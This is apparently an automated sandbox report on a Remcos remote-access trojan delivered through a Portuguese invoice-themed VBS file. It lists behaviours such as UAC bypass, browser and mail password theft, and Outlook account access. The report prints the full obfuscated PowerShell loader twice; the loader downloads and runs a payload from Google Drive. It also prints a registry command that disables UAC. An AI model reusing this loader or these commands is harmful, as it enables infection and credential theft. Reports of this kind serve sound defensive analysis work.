Malware Analysis Report

2024-12-01 03:08

Sample ID 241111-p77dlszdmh
Target 11112024_1259_detalhe_fatura_20241105·pd.vbs.zip
SHA256 2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab
Tags
remcos remotehost collection credential_access discovery evasion rat stealer trojan
score
10/10

Analysis Overview

Threat Level: Known bad

The file 11112024_1259_detalhe_fatura_20241105·pd.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos family

Remcos

NirSoft WebBrowserPassView

Detected Nirsoft tools

NirSoft MailPassView

Uses browser remote debugging

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook accounts

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious use of FindShellTrayWindow

Modifies registry key

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies registry class

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 12:59

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 12:59

Reported

2024-11-11 13:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. 
Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI 
FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG 
pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabE0D0.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 12:59

Reported

2024-11-11 13:04

Platform

win10v2004-20241007-en

Max time kernel

300s

Max time network

290s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4276 set thread context of 3604 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 set thread context of 60 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 set thread context of 1272 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4576 wrote to memory of 3128 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 744 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 4276 wrote to memory of 4816 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4816 wrote to memory of 1012 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 4276 wrote to memory of 2208 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 4984 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 2524 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2208 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. 
Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI 
FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG 
pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa20b4cc40,0x7ffa20b4cc4c,0x7ffa20b4cc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

